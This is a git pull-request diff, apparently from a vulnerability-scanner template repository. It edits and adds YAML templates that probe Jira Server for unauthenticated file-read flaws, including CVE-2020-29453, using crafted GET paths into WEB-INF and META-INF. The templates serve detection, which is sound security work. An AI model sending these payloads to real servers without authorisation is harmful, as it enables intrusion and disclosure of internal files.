Merge pull request #2461 from dwisiswant0/add/CVE-2020-29453

Add CVE-2020-29453
patch-1
Sandeep Singh 2021-08-23 14:56:44 +05:30 committed by GitHub
commit 174cd79e1b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 32 additions and 9 deletions

View File

@ -8,21 +8,18 @@ info:
tags: cve,cve2019,atlassian,jira,lfi tags: cve,cve2019,atlassian,jira,lfi
requests: requests:
- raw: - method: GET
- | path:
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
Host: {{Hostname}} - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: deflate
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- <groupId>com.atlassian.jira</groupId> - '<groupId>com.atlassian.jira</groupId>'
part: body part: body

View File

@ -0,0 +1,26 @@
id: CVE-2020-29453
info:
name: Pre-Auth Limited Arbitrary File Read in Jira Server
author: dwisiswant0
severity: medium
description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
reference: https://jira.atlassian.com/browse/JRASERVER-72014
tags: cve,cve2020,atlassian,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
- "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<groupId>com.atlassian.jira</groupId>'
part: body